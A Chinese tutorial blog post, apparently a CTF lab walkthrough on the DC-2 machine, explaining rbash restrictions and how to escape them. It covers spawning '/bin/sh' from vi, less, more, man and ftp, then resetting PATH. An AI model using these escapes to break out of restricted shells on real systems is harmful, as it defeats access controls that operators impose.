-
linux进行rbash逃逸的方法
目录
一、什么是rbash
受限shell是linux shell限制一些bash shell中的功能,并且是从名字上很清楚。该限制很好地显示了命令以及脚本在受限shell中运行。它为linux中的bash shell提供了一个额外的安全层。
不能使用cd命令;
不能设置或取消环境变量:SHELL,PATH,ENV,BASH_ENV;
导入功能受限;
指定包含参数’/’或’-’的文件名;
不能使用>,>|,<>,>&,&>,>>等重定向操作符;
不能使用’set +r’或者’set +o’关闭。
二、rbash逃逸
(一)rbash限制提示
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
(二)rbash逃逸方法
利用系统常见应用逃逸,常见利用的命令如下。
ftp
more
less
man
vi
vim
以上在输入的地方输入!/bin/sh或!/bin/bash。
(三)利用vi命令进行rbash逃逸案例
1. vi flag3.txt文本文件
2. 输入英文冒号:
3. 在冒号后输入set shell=/bin/sh回车
4. 输入:shell调用/bin/sh
5. 逃逸成功
6. 设置命令路径变量
rbash逃逸之后,在shell中添加命令路径变量:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin7. 验证cat flag3.txt
可以使用cat命令查看文件内容。
-
相关阅读:
千峰商城-springboot项目搭建-82-订单提交及支付-支付回调
android 存储新特性
数据库基础 - 数据类型、关键字、cmd中操作数据库的命令
经济师报考专业选择及难度分析!这三个专业每年报考人数超10万!
SpringCloud:注册中心nacos(集群部署)
RISC-V (五)上下文切换和协作式多任务
Redis入门
操作系统之启动过程
多维时序 | MATLAB实现WOA-CNN-BiLSTM-Attention多变量时间序列预测(SE注意力机制)
【离网逆变器】离网逆变器型号由一个高频DC-DC升压转换器与全桥PI控制电压源逆变器级联组成、逆变器使用带LC滤波器的SPWM调制(Simulink)
- 原文地址:https://blog.csdn.net/u013930899/article/details/126815615